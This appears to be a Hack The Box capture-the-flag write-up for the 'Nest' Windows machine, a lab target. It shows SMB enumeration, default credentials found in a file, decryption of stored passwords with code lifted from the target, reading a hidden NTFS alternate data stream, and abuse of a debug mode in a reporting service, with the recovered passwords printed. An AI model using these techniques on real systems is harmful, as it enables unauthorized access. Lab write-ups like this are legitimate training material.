Hack The Box - Nest

Nest is a Windows machine considered easy/medium. An anonymous SMB access allows to retrieve a first non-privileged account. The recovery of an encrypted password and sources of a Visual Basic project allows lead the user’s password decryption. Privilege escalation is done through a “reporting” service allowing to get a new encrypted string on the disk. The decryption of this last one allows an administrator access.

Disclaimer : It is a rather quick presentation that deliberately omits the various research areas. Only the actual results and a quick approach are presented. Furthermore, I didn’t have lot of time to write and translate this write-up, so I used deepl.com translator for some parts ! I’m sorry if the english is not that good ! :)

Discovery / Enumeration

A quick port scan gives us running services on the machine

$ sudo nmap -sS -p 0-10000 -T4 -sV -sC default -O -v -oN scan_nmap 10.10.10.178

Nmap scan report for 10.10.10.178
Host is up (0.030s latency).
Not shown: 9999 filtered ports
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe: 
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     Reporting Service V1.2
|     Unrecognised command
|   Help: 
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.70%I=7%D=2/23%Time=5E52D49C%P=x86_64-pc-linux-gnu%r(NU
SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin
SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise
SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2
SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma
SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo
SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\
SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th
SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---
SF:\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\
SF:nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionReq,21,"\
SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,21,"\r\nH
SF:QK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\nHQK\x20
SF:Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A,"\r\nHQ
SF:K\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20command\
SF:r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n
SF:>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\
SF:n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n
SF:>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\
SF:r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20Reporting
SF:\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x20Reporti
SF:ng\x20Service\x20V1\.2\r\n\r\n>")%r(NCP,21,"\r\nHQK\x20Reporting\x20Ser
SF:vice\x20V1\.2\r\n\r\n>");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 1.473 days (since Sat Feb 22 09:20:24 2020)
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental

Host script results:
|_clock-skew: mean: 1m52s, deviation: 0s, median: 1m52s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-02-23 20:42:32
|_  start_date: 2020-02-22 09:23:12

NSE: Script Post-scanning.
Initiating NSE at 20:41
Completed NSE at 20:41, 0.00s elapsed
Initiating NSE at 20:41
Completed NSE at 20:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1012.52 seconds
           Raw packets sent: 30720 (1.357MB) | Rcvd: 663 (31.066KB)

The scan is revealing that 2 ports are open. The classical 445 but also the 4386 which seems to be a “Reporting” service.

Anonymous SMB access and temporary account

For the first research, we can start with a service we already know, SMB shares. Thanks to an anonymous connection, we are able to list the readable shares.

$ smbclient -U "" -L \\\\10.10.10.178
Unable to initialize messaging context
Enter WORKGROUP\'s password: 

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    Data            Disk      
    IPC$            IPC       Remote IPC
    Secure$         Disk      
    Users           Disk      
SMB1 disabled -- no workgroup available

3 shares can be interesting for the moment: - Data - Secure$ - USers$

We start by looking at the Users$ share, which among other things allows us to retrieve the list of users on the machine. Useful!

$ smbclient -U "" \\\\10.10.10.178\\Users
Unable to initialize messaging context
Enter WORKGROUP\'s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 00:04:21 2020
  ..                                  D        0  Sun Jan 26 00:04:21 2020
  Administrator                       D        0  Fri Aug  9 17:08:23 2019
  C.Smith                             D        0  Sun Jan 26 08:21:44 2020
  L.Frost                             D        0  Thu Aug  8 19:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 19:02:50 2019
  TempUser                            D        0  Thu Aug  8 00:55:56 2019

        10485247 blocks of size 4096. 6545336 blocks available

Being curious, we can try the Secure$ share. But the name is true, this one is more secured, and we can’t log without a user account.

$ smbclient -U "" \\\\10.10.10.178\\Secure$
Enter WORKGROUP\'s password: 
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*

Last unexplored way, the Data share. We can see different things.

$ smbclient -U "" \\\\10.10.10.178\\Data   
Unable to initialize messaging context
Enter WORKGROUP\'s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  8 00:53:46 2019
  ..                                  D        0  Thu Aug  8 00:53:46 2019
  IT                                  D        0  Thu Aug  8 00:58:07 2019
  Production                          D        0  Mon Aug  5 23:53:38 2019
  Reports                             D        0  Mon Aug  5 23:53:44 2019
  Shared                              D        0  Wed Aug  7 21:07:51 2019

        10485247 blocks of size 4096. 6545336 blocks available

After some research, we quickly come across a “Welcome Email” text file. This type of file can be very interesting because it can contain information such as default accounts.

smb: \Shared\Templates\HR\> ls
  .                                   D        0  Wed Aug  7 21:08:01 2019
  ..                                  D        0  Wed Aug  7 21:08:01 2019
  Welcome Email.txt                   A      425  Thu Aug  8 00:55:36 2019

        10485247 blocks of size 4096. 6545577 blocks available

smb: \Shared\Templates\HR\> get "Welcome Email.txt"
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (3.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)

By getting this file, we manage to get the first real foothold, a user account !

$ cat Welcome\ Email.txt 
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location: 
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the 
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
HR%        
````

We then try to log in to the `Secure$` share using our new account and boom, it is now in range for us.

```bash
$ smbclient -U "TempUser" \\\\10.10.10.178\\Secure$
Unable to initialize messaging context
Enter WORKGROUP\TempUser\'s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  8 01:08:12 2019
  ..                                  D        0  Thu Aug  8 01:08:12 2019
  Finance                             D        0  Wed Aug  7 21:40:13 2019
  HR                                  D        0  Thu Aug  8 01:08:11 2019
  IT                                  D        0  Thu Aug  8 12:59:25 2019

Enumeration and gathering VB project

Here begins a new enumeration phase. Indeed, all the elements that were not previously accessible have to be analyzed, looking for new information. This includes a portion of the previously inaccessible Data$ share.

$ smbclient -U "TempUser" \\\\10.10.10.178\\Data    
Enter WORKGROUP\TempUser\'s password: 
Try "help" to get a list of possible commands.
smb: \> cd IT
smb: \IT\> ls
  .                                   D        0  Thu Aug  8 00:58:07 2019
  ..                                  D        0  Thu Aug  8 00:58:07 2019
  Archive                             D        0  Tue Aug  6 00:33:58 2019
  Configs                             D        0  Thu Aug  8 00:59:34 2019
  Installs                            D        0  Thu Aug  8 00:08:30 2019
  Reports                             D        0  Sun Jan 26 01:09:13 2020
  Tools                               D        0  Tue Aug  6 00:33:43 2019

        10485247 blocks of size 4096. 6545577 blocks available
smb: \IT\> cd

Using the method we previsouly used for the welcome email, we quickly find an interesting file, located in one of the configuration folders, which seems to be used for a project called “RU Scanner”.

smb: \IT\Configs\Ru Scanner\> ls
  .                                   D        0  Wed Aug  7 22:01:13 2019
  ..                                  D        0  Wed Aug  7 22:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 21:49:37 2019

        10485247 blocks of size 4096. 6545577 blocks available
$ cat RU_config.xml 
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>%

A user! The password here seems encrypted. Nevertheless, no doubt, we’re on the right track. New mission: find the project “RU Scanner”. Indeed, if it uses configuration files like this one, then it must be able to decipher the password.

I didn’t mention it at the beginning of the post, but this machine relies mainly on enumeration and information gathering. As always, not being able to move forward, we continue to investigate the resources that are available. A good idea may be to go and search the other resources in the “Configs” directory. Indeed, there is for example a configuration for the Notepad++ software.

smb: \IT\Configs\NotepadPlusPlus\> ls
  .                                   D        0  Wed Aug  7 21:31:37 2019
  ..                                  D        0  Wed Aug  7 21:31:37 2019
  config.xml                          A     6451  Thu Aug  8 01:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 21:30:27 2019

        10485247 blocks of size 4096. 6545509 blocks available

This file reveals an absolute path toward the Carl user personnal files.

    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
    </History>

Even though we don’t have permission to list the contents of the IT directory, it turns out that it is possible to continue in the tree, if we have a valid path. This is exactly what we just found. This way, we can sneak into the user’s directory. :)

smb: \IT\Carl\> ls
  .                                   D        0  Wed Aug  7 21:42:14 2019
  ..                                  D        0  Wed Aug  7 21:42:14 2019
  Docs                                D        0  Wed Aug  7 21:44:00 2019
  Reports                             D        0  Tue Aug  6 15:45:40 2019
  VB Projects                         D        0  Tue Aug  6 16:41:55 2019

        10485247 blocks of size 4096. 6545509 blocks available

The VB Projects directory clearly shows the way. A few directories further on, we come across the famous RUScanner project!

smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> ls
  .                                   D        0  Thu Aug  8 00:05:54 2019
  ..                                  D        0  Thu Aug  8 00:05:54 2019
  bin                                 D        0  Wed Aug  7 22:00:11 2019
  ConfigFile.vb                       A      772  Thu Aug  8 00:05:09 2019
  Module1.vb                          A      279  Thu Aug  8 00:05:44 2019
  My Project                          D        0  Wed Aug  7 22:00:11 2019
  obj                                 D        0  Wed Aug  7 22:00:11 2019
  RU Scanner.vbproj                   A     4828  Fri Aug  9 17:37:51 2019
  RU Scanner.vbproj.user              A      143  Tue Aug  6 14:55:27 2019
  SsoIntegration.vb                   A      133  Thu Aug  8 00:05:58 2019
  Utils.vb                            A     4888  Wed Aug  7 21:49:35 2019

        10485247 blocks of size 4096. 6545509 blocks available

Small trick you can use in order to download an entire folder using smbclient.

smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> mask ""
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> recurse ON
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> prompt OFF
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> mget *
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\ConfigFile.vb of size 772 as ConfigFile.vb (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
...

Decryption and user shell

Having now the source code of the VB project, the goal is to identify the parts of the code allowing to perform the encryption/decryption of passwords. I won’t go into the details of the code, but a Decrypt function can be identified quite easily.

It takes several variables as parameters, including the encrypted password. If you don’t have the necessary environment to work with VB, you should know that there are several online services offering a simplified virtual environment.

This is notably the case of dotnetfiddle.com that I used for this machine. So we extract the decryption function, which we will call in a simple module, then we display the result.

Imports System
Imports System.Security.Cryptography
Imports System.Text

Public Module Module1
    Public Sub Main()
        Console.WriteLine("Hello World")
        Dim password As String
        password = Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        Console.WriteLine(password)
    End Sub
    
    Public Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)

        Return plainText
    End Function
End Module

We quickly get the desired result, password !

Hello World
xRxRxPANCAK3SxRxRx

In particular, this allows us to get access to a new zone, as well as the user flag!

$ smbclient -U "c.smith" \\\\10.10.10.178\\Users
Enter WORKGROUP\c.smith\'s password: 
Try "help" to get a list of possible commands.
smb: \> cd C.Smith\
smb: \C.Smith\> ls
  .                                   D        0  Sun Jan 26 08:21:44 2020
  ..                                  D        0  Sun Jan 26 08:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 01:06:17 2019
  user.txt                            A       32  Fri Aug  9 01:05:24 2019

        10485247 blocks of size 4096. 6545509 blocks available

Getting the DEBUG password

New access = new enumeration phase. The directory HQK Reporting draws our attention. Remember, similar information was reported during the nmap scan. So it makes sense that this is the reporting service.

smb: \C.smith\HQK Reporting\> ls
  .                                   D        0  Fri Aug  9 01:06:17 2019
  ..                                  D        0  Fri Aug  9 01:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 14:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 01:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 01:09:05 2019

        10485247 blocks of size 4096. 6544215 blocks available

During my first researches on the machine, I tried to connect to the service saw a debugging function, requiring a password. That’s fortunate, the above extract mentions a Debug Mode Password.txt file. Only problem, the file seems empty (size 0)…

This is where a file system trick comes in, streams! In simple words, a stream is a sequence of bytes containing information about a file. It can be keywords, owner information, etc. It is possible to create different streams.

With smbclient you can see this information with the following command.

smb: \C.smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Fri Aug  9 01:06:12 AM 2019 CEST
access_time:    Fri Aug  9 01:06:12 AM 2019 CEST
write_time:     Fri Aug  9 01:08:17 AM 2019 CEST
change_time:    Fri Aug  9 01:08:17 AM 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes

Thus we observe an interesting element… The default stream ($DATA) is indeed empty, but a second stream, named “Password” has been created ! smbclient also offers the possibility to download a file by specifying the desired steams. So…

smb: \C.smith\HQK Reporting\> get "Debug Mode Password.txt:Password:$Data"
getting file \C.smith\HQK Reporting\Debug Mode Password.txt:Password:$Data of size 15 as Debug Mode Password.txt:Password:$Data (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

$ cat Debug\ Mode\ Password.txt:Password:\$Data 
WBQ201953D8w 

Playing with the reporting service

The resolution of this machine continues on the second service identified during port scanning. This allows you to connect to the service through telnet.

$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>

Now that we have the DEBUG password, we can start this mode and get access to more commands.

>DEBUG WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>HELP

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

The SERVICE command tells us the binary used here, while the SESSION command tells us the current directory.

>SERVICE

--- HQK REPORTING SERVER INFO ---

Version: 1.2.0.0
Server Hostname: HTB-NEST
Server Process: "C:\Program Files\HQK\HqkSvc.exe"
Server Running As: Service_HQK
Initial Query Directory: C:\Program Files\HQK\ALL QUERIES

>SESSION

--- Session Information ---

Session ID: 32315e55-e64a-4b71-bf3f-124285e93ede
Debug: True
Started At: 3/29/2020 11:55:33 AM
Server Endpoint: 10.10.10.178:4386
Client Endpoint: 10.10.14.4:34380
Current Query Directory: C:\Program Files\HQK\ALL QUERIES

Afterwards, the SETDIR, LIST and SHOWQUERY commands are used. In fact, we can use them as a system to browse the machine filesystem. Indeed, it is possible to associate these commands with the classic cd, ls and cat commands.

>SETDIR ../

Current directory set to HQK

>LIST

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK

The LDAP and Logs directories catch our attention. The LDAP directory is where we find what we are looking for.

>SETDIR LDAP

Current directory set to LDAP

>LIST

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP

The Ldap.conf file reveals the desired information such as the encrypted password for the administrator!

>SHOWQUERY 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

Decryption vol.2 and privilege escalation

Okay, we now have an encrypted password for the privileged account! This part seems to be directly used by the process to perform the administrator authentication. So that means we’re going to have to interact directly with this process.

We start by retrieving it locally.

Once this is done, we can decompile the binary. I used dnSpy for this. I also skip the analysis here, but we quickly find the decryption function. This one is identical to the one previously identified for the user part.

At this point, there are two options to decrypt the password : - Modify the binary code, to display the decrypted password, then recompile and execute it; - Use our online environment again by changing the function settings.

Not being very good with dnSpy and being a bit fed up of this machine, I took the easy way out by reusing the same thing as for the user :).

[...]
Public Sub Main()
        Console.WriteLine("Hello World")
        Dim password As String
        password = Decrypt(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256, 256)
        Console.WriteLine(password)
    End Sub
[...]

And so: XtH4nkS4Pl4y1nGX

Tadaaaam! We can connect and get the root flag.

For your information, I first went to the Users share and this is what I found.

$ smbclient -U "Administrator" \\\\10.10.10.178\\Users  
Unable to initialize messaging context
Enter WORKGROUP\Administrator\'s password: 
Try "help" to get a list of possible commands.
smb: \> cd Administrator\
smb: \Administrator\> ls
  .                                   D        0  Fri Aug  9 17:08:23 2019
  ..                                  D        0  Fri Aug  9 17:08:23 2019
  flag.txt - Shortcut.lnk             A     2384  Fri Aug  9 17:10:15 2019

    10485247 blocks of size 4096. 6544908 blocks available

No root flag… But a “flag.txt” file (impossible to retrieve for me). After a few seconds, I thought about the fact that the Users share was a copy/reproduction of the C:/Users directory of the machine, and that having administrator rights, we could simply connect to it.

$ smbclient -U "Administrator" \\\\10.10.10.178\\C$
Enter WORKGROUP\Administrator\'s password: 
Try "help" to get a list of possible commands.
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Sun Jan 26 08:20:50 2020
  ..                                 DR        0  Sun Jan 26 08:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 23:02:44 2020
  root.txt                            A       32  Tue Aug  6 00:27:26 2019

    10485247 blocks of size 4096. 6543963 blocks available

w00ted !

Hack The Box - Resolute Hack The Box - Monteverde